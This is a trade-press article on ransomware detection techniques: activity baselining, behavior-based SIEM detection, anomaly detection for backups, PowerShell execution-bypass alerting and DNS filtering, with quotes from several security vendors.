Ransomware is everywhere. The NCC Group Annual Threat Monitor report states that ransomware attacks rose 93 percent in 2021. While there were 1,389 such attacks in 2020, they soared to 2,690 in 2021. The U.S. was the prime target, accounting for more than half of the attacks, followed by Europe at 30 percent. The industrial and public sectors were the most popular verticals (both at 19.35 percent) followed by consumer cyclicals (16.13 percent). NCC Group added that ransomware accounts for 65.38 percent of all incidents its global cyber incident response team dealt with for the year.
With ransomware being so prevalent, what should organizations be doing to detect it, mitigate its impact, and prevent any future attacks?
Here are some of the top techniques for ransomware detection and prevention.
Monitoring systems for unusual activity
One of the standard ways of detecting ransomware is by monitoring data usage patterns for unusual activity.
Signals of unusual activity
Out-of-the-ordinary activity—like file name or extension changes, data transfers, or permissions updates—can signal a ransomware attack in progress. For this technique to work, however, security professionals need to have a baseline for normal activity levels, ideally across a large cross-section of files, locations, and functions.
Once that baseline is available, spotting attacks in progress is easier and more accurate. But establishing the baseline is hard.
How to establish a baseline
First, you need to understand which files are business-critical and which are not. Of the millions of files under management at most enterprises, only 12 to 15 percent are business-critical, said Karthik Krishnan, CEO, Concentric Security.
Baselining all files takes more resources, and it can lead to frustrating false positives. In addition, it is vital to understand what a normal activity level looks like, and that can vary quite a bit from user to user. Collecting that information takes time.
“While baseline-based attack detection is a robust way to spot ransomware attacks, the need for large amounts of data and analytics has kept the technique out of reach,” said Krishnan. “However, emerging AI-based tools can autonomously create and evaluate a baseline for activity. With that, ransomware detection based on activity monitoring is now within reach.”
Concentric’s Semantic Intelligence, for example, can autonomously establish baseline parameters for data security management without needing rules or policies developed by the IT team. Its Risk Distance analysis baselines security practices and surfaces at-risk data.
Attackers consistently abuse legitimate tools—a tactic known as living off the land—to locate critical systems, weaknesses, and vulnerabilities before launching a ransomware attack. These behaviors often take place over a period of days or weeks.
During this time, an attacker can go undetected by endpoint detection tools because the attacker is not using anything that is known to be malicious. In other words, endpoint detection and response (EDR) tools may have a hard time detecting attacker behavior until it is too late.
The best approach for early detection
Detecting potentially threatening behavior and detecting known-bad file signatures are both important approaches. But they won’t catch living off the land tactics that harness legitimate and trusted tools.
Similarly, threat-based AI or machine learning (ML) solutions may result in a higher false-positive rate and can become unmanageable. Instead, the behavior-based approach that a modern security infrastructure and event management (SIEM) platform provides can detect living off the land techniques that signature-based detection cannot.
“It’s extremely important that organizations focus on detecting the first three steps of a ransomware attack: discovery, gaining a foothold, and escalating privileges,” said Matthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology. “Detection, in addition to being aware as to what data you hold that could help you restore from a backup, will allow you to quickly respond to attacks, or at worst case, understand how to handle post-exploitation of a ransomware event.”
Anomaly detection for backups
The ransomware fraternity now consists of a vast ecosystem with many different forms of attacks. Many attackers have their own versions of ransomware, and these are called variants. Each variant has the same purpose, but it uses a different mechanism or simply a different naming convention.
The majority of ransomware variants and all of the top 10 forms for 2021 followed the same attack pattern: infiltrate a computer and rename the files with a different extension.
Why is anomaly detection important for backups?
Organizations need to detect ransomware as early as possible to stop the threat and commence remediation. And since ransomware tends to hit the backups first, organizations should opt for a backup solution that includes anomaly detection that can identify changes in an environment that requires the attention of IT, said JG Heithcock, general manager of Retrospect.
The right solution should allow admins to:
- Set the filter for the data in the environment that must be observed
- Set a threshold for irregular behavior (for example, if the percentage of files new or changed out of the total number of files matched by the filter is greater than or equal to the threshold, it will create an anomaly event)
- Customize the notification process
“When it comes to ransomware, a multi-pronged approach that includes protection, detection (i.e., anomaly detection) and the ability to recover (i.e., object locking and immutable backups) is the best defense,” said Heithcock. “It’s critical to know when you are being attacked, but it’s even more important that you are able to recover, maintain operations, and avoid paying even a cent in ransom.”
Tracking the exact path of entry and attack
When many people think about ransomware detection, they think about detecting the absolute last mile of the operation—the part after full enterprise compromise has occurred, and malicious payloads are delivered to encrypt and destroy data.
Unfortunately, detecting ransomware at this stage may still be fatal, as an adversary likely has complete control of the environment and can come and go at will. Some even say ransomware is something of a misnomer as it relates to the modern variants. RansomOps may be a better framing of the real threat.
What is RansomOps?
“RansomOps is all about detecting the exact tactics, techniques, and procedures used by a human operator that has infiltrated the network,” said Tim Wade, deputy CTO at Vectra, an AI cybersecurity company. “It involves detecting indications of initial compromise, discovery, and ultimately lateral movement activities – ideally as early as possible before redundant and persistent access can be achieved.”
However, this isn’t an easy task for most enterprise security programs without reorienting their focus, particularly when adversaries are using infrastructure and payloads that haven’t been discovered or turned into indicators of compromise yet.
Tools for ransomware tracing
That said, CISA maintains a list of known-exploited common vulnerabilities and exposures (CVEs) that can be a good resource to monitor for abuse. While threat intelligence won’t prevent a patient zero scenario, it can retrospectively uncover symptoms of compromise.
Vectra, too, offers an AI-driven detection and response approach that allows organizations to see and stop ransomware before damage occurs. It spots the earliest signs of ransomware including recon, privilege escalation, and lateral movement. It includes tools to help organizations with digital forensics and root out any lingering malware.
Dynamic threat hunting tools that leverage AI are vital to ransomware detection. But there is still the need for that human touch and the insight that can only come from an individual.
Lee Tibbals, senior cybersecurity analyst at Avertium, is a veteran of many threat hunts including the infamous SolarWinds and Log4j attacks. He takes advantage of tools such as SIEM and EDR but says there is no escaping the need for the analyst to have a deep knowledge of the IT environment.
The value of human analysts in threat hunting
IT security analysts can provide valuable context such as what logs there are to parse through and what other vital information is available across the different systems. It is the combination of analyst skill and IT/security tools and data that help to unravel the attack vectors, malware strains, and prevent an attack.
“Having a good knowledge of the environment is the foundation to a successful threat hunt, along with the understanding of the threat indicators that make up a malicious campaign one might find when going through the logs,” said Tibbals.
PowerShell is a common vector used in ransomware attacks, so detecting malicious PowerShell activity is important to stop an attack in progress. Threat actors gravitate towards PowerShell because it’s a common IT tool and appears innocuous. Under the surface, though, it’s an extremely powerful utility that can perform a variety of tasks, including executing commands, obfuscating code, and downloading payloads.
How to handle PowerShell threat detection
A smart detection tactic is to pay attention to PowerShell execution bypass, a setting that determines which type of PowerShell scripts (if any) can be run on systems. Reason: Attackers and malicious software can leverage PowerShell execution policy settings to execute code on systems without administrative access.
“There are several different ways to alert on PowerShell commands and scripts, including third-party software,” said Warner. “It is also fairly straightforward to enable it in Microsoft Group Policy but detecting the technique using that method would require combing through raw logs in Windows Event Viewer.”
Blumira’s threat detection and response platform, for example, can detect a PowerShell execution bypass in near real-time, alerting users early enough to stop a ransomware attack. The company also provides playbooks on how to remediate the alert with the ability to contact its support team for further assistance.
Remote access security
Keeping systems secure is a top priority for any IT team, and it’s only gotten more complicated since remote and hybrid work became the norm.
According to Coveware, 63 percent of ransomware attacks perform command and control (C2) actions using remote access software. To guard against the threat posed by insecure remote workforces, companies such as RealVNC offer remote access software that prioritizes security.
Sending DNS requests through a service that can classify and block domains, therefore, is an easy and effective way to get insight into what’s going on in the network. And with almost all ransomware operating with a command and control (C2) server, the ability to highlight those requests is more important than ever.
“In the DNS world, it’s not enough to rely on open-source intelligence (OSINT) data anymore,” said Peter Lowe, principal security researcher at DNSFilter. OSINT is a collaborative collection and analysis of data that aims to provide actionable security intelligence, mainly for national security, law enforcement, and business intelligence functions.
Accordingly, providers such as DNSFilter offer solutions that include AI-driven content categorization, application blocking, and DNS reporting.
Ransomware detection techniques reduce the impact of attacks
As ransomware attacks have become a bigger threat to enterprises, detection tools are more valuable than ever. The right cybersecurity solutions will help your IT team monitor your organization’s systems, generate alerts in the event of unusual behavior, and take steps to mitigate the attack.
However, the best way to minimize damage to your business assets and costly disruptions to your operations is to take steps to prevent ransomware attacks altogether. A strong prevention strategy will help you avoid becoming the next ransomware victim.
Read next: How to Prevent Ransomware Attacks